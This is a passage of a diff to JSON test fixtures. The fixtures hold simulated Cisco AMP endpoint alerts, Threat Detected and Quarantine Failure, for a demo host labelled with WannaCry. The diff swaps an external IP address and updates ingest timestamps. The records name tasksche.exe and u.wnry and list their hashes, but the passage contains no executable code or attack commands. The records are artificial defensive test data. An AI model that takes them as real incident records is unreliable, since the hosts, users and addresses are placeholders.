Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461709400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3459,7 +3459,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3505,7 +3505,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3522,8 +3522,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103800964Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461715100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3545,7 +3545,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3586,7 +3586,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3596,8 +3596,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103810465Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461720800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3617,7 +3617,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3662,7 +3662,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3672,8 +3672,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103812823Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461743900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3693,7 +3693,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3738,7 +3738,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3748,8 +3748,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103814854Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461750200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3769,7 +3769,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3814,7 +3814,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3824,8 +3824,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103817060Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461773300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3845,7 +3845,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3890,7 +3890,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3900,8 +3900,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103819277Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461779700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3921,7 +3921,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3982,7 +3982,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3999,8 +3999,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103825578Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:51.461784300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4022,7 +4022,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -4072,7 +4072,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4089,8 +4089,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103828588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat 